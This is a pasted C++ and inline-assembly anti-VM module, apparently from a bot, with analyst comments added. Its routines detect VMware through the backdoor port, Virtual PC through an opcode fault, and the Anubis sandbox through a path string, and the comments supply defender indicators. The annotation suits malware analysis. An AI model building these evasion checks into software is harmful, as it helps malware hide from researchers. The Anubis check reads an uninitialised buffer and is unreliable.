
VMware C++ By Ahmad Wolf

a guest Mar 30th, 2015 274 Never
  1.  
  2. #include "../Headers/includes.h"
  3. #include "../Headers/functions.h"
  4.  
  5. #ifndef NO_ANTIVM
  6.  
  /*
   * SEH filter used by the __except clause of DetectVPC().
   *
   * It runs when the four bytes emitted in DetectVPC() raise an exception
   * instead of being serviced. The filter does not unwind: it edits the saved
   * thread context and asks the OS to resume execution from it.
   *
   *   ep  exception pointers supplied by GetExceptionInformation().
   *
   * Returns EXCEPTION_CONTINUE_EXECUTION in every case, so the associated
   * __except body is never entered through this filter.
   *
   * Analyst note: because the saved EIP is rewritten here, a debugger that
   * intercepts the first-chance exception sees control resume 4 bytes after
   * the faulting address rather than in a handler block.
   */
  DWORD __forceinline IsInsideVPC_exceptionFilter(LPEXCEPTION_POINTERS ep)
  {
      // Non-zero EBX is what DetectVPC() later reads as "not running VPC".
      ep->ContextRecord->Ebx = -1;

      // Step over the 4-byte "call VPC" sequence that faulted.
      ep->ContextRecord->Eip += 4;

      return EXCEPTION_CONTINUE_EXECUTION;
  }
  14.  
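  /*
   * Virtual PC presence probe (x86, MSVC inline assembly).
   *
   * Executes the byte sequence 0F 3F 07 0B with EAX = 1 and EBX = 0. Per the
   * original author's comments, EBX stays zero when Virtual PC services the
   * sequence. When the sequence faults instead, IsInsideVPC_exceptionFilter()
   * sets the saved EBX to -1 and resumes after the four bytes, so the
   * test/setz pair below records "not present".
   *
   * Returns TRUE when the probe was answered, FALSE otherwise.
   *
   * Fix over the listing as pasted: the filter expression called
   * "GetExceptionI nformation()" (stray space inside the identifier), which
   * is not a valid name; it is restored to GetExceptionInformation().
   *
   * Defender note: the four emitted bytes end up literally in the compiled
   * function, next to an SEH filter that adds 4 to the saved EIP. That pair
   * is a usable static indicator for this anti-analysis check.
   */
  bool DetectVPC()
  {
      bool bVPCIsPresent = FALSE;

      __try
      {
          __asm
          {
              push ebx
              mov  ebx, 0           // stays zero only if the probe is serviced
              mov  eax, 1           // VPC function number
              __emit 0Fh            // 0F 3F 07 0B: the "call VPC" byte sequence
              __emit 3Fh
              __emit 07h
              __emit 0Bh
              test ebx, ebx
              setz [bVPCIsPresent]  // TRUE only when EBX is still zero
              pop  ebx
          }
      }
      __except (IsInsideVPC_exceptionFilter(GetExceptionInformation()))
      {
          // Intentionally empty: the filter always returns
          // EXCEPTION_CONTINUE_EXECUTION, so this body is not entered.
      }

  #ifdef DEBUG
      if (bVPCIsPresent == TRUE)
          DebugMsg("Bot is under VPC !");
      else
          DebugMsg("Bot is not running under VPC !");
  #endif

      return bVPCIsPresent;
  }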
  46.  
  /*
   * VMware presence probe (x86, MSVC inline assembly).
   *
   * Loads EAX with 'VMXh', ECX with 10 (commented by the author as "get
   * VMWare version") and DX with 'VX', then executes IN EAX, DX. The result
   * flag starts out TRUE and is overwritten by setz with the outcome of
   * comparing EBX against 'VMXh' after the port read. If the IN instruction
   * raises an exception, the handler forces the flag to FALSE.
   *
   * Returns TRUE when EBX came back holding 'VMXh', FALSE otherwise.
   *
   * Defender note: the 'VMXh' and 'VX' immediates followed by an IN
   * instruction in user-mode code are a long-standing static indicator of
   * this check. An analysis VM can be configured to restrict this channel,
   * in which case the probe is expected to report FALSE -- verify against
   * the hypervisor in use.
   */
  bool DetectVMWare()
  {
      bool fUnderVMware = TRUE;

      __try
      {
          __asm
          {
              // Preserve the registers the probe overwrites.
              push edx
              push ecx
              push ebx

              mov  eax, 'VMXh'       // magic value sent with the request
              mov  ebx, 0            // anything except the magic value
              mov  ecx, 10           // command: get VMWare version
              mov  edx, 'VX'         // port number

              in   eax, dx           // read port; EAX receives the version

              cmp  ebx, 'VMXh'       // did the reply carry the magic value?
              setz [fUnderVMware]    // record the comparison result

              pop  ebx
              pop  ecx
              pop  edx
          }
      }
      __except (EXCEPTION_EXECUTE_HANDLER)
      {
          // The port read faulted, so nothing answered the request.
          fUnderVMware = FALSE;
      }

  #ifdef DEBUG
      if (fUnderVMware == TRUE)
      {
          DebugMsg("Bot is under VMWare !");
      }
      else
      {
          DebugMsg("Bot is not running under VMWare !");
      }
  #endif

      return fUnderVMware;
  }
  87.  
  /*
   * Sandbox check keyed on a directory name: reports TRUE when the local
   * buffer szBotFile contains the substring "C:\InsideTm\", the path the
   * author associates with the Anubis sandbox.
   *
   * NOTE(review): szBotFile is declared but never written before strstr()
   * reads it. The buffer therefore holds whatever was on the stack, the read
   * may run past its end looking for a terminator, and the result is
   * indeterminate. Treat this check as unreliable when analysing the sample.
   *
   * Defender note: the literal "C:\\InsideTm\\" is stored in the binary
   * as-is and is a convenient string indicator for this family of checks.
   */
  bool DetectAnubis()
  {
      char szBotFile[MAX_PATH];   // NOTE(review): read below without being initialised
      bool fSandboxPath = strstr(szBotFile, "C:\\InsideTm\\") ? TRUE : FALSE;

  #ifdef DEBUG
      if (fSandboxPath == TRUE)
      {
          DebugMsg("Bot is running under Anubis !");
      }
      else
      {
          DebugMsg("Bot is not running under Anubis !");
      }
  #endif

      return fSandboxPath;
  }
  105.  
  /*
   * Aggregate environment check: runs the VMware, Virtual PC and Anubis
   * probes, in that order, and reports TRUE if any one of them fired.
   *
   * All three probes are always executed; none is skipped when an earlier
   * one has already returned TRUE.
   *
   * Defender note: this is the single decision point for the sample's
   * environment checks, so its callers are where behaviour diverges between
   * an analysis VM and a physical host.
   */
  bool IsProcessRunningUnderVM()
  {
      // Evaluate every probe up front so each runs exactly once, in order.
      const bool fVMware = DetectVMWare();
      const bool fVPC    = DetectVPC();
      const bool fAnubis = DetectAnubis();

      return fVPC || fVMware || fAnubis;
  }
  121. #endif